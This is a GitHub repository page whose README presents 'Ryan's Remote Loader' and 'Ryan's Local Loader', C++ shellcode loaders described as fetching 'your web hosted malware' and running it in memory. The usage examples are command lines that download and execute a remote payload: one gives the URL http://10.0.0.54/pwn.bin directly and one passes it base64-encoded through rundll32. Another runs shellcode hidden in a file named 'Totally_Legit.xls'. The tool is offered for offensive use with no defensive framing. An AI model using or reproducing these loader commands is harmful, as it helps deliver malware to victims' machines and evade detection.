Skip to content

ryansisco/RyanLoader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Ryan's Remote Loader

RRLEXE.7z and RRLDLL.7z

Custom shellcode loader written in C++. This will grab your web hosted malware and run it in memory. This project is password protected at this time.

alt text

Examples:

RRL.exe will take the remote bin file as a parameter like: RRL.exe http://10.0.0.54/pwn.bin

This can also be run as a DLL using a base64 encoded parameter: rundll32.exe RRLDLL.dll,Driver aHR0cDovLzEwLjAuMC41NC9wd24uYmluCg==

Ryan's Local Loader

RLLDLL.7z

Also written in C++, this will decode and execute your shellcode that was saved to disk.

Examples:

rundll32.exe RLLDLL.dll,Perform C:\Users\Brad\Downloads\Totally_Legit.xls

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks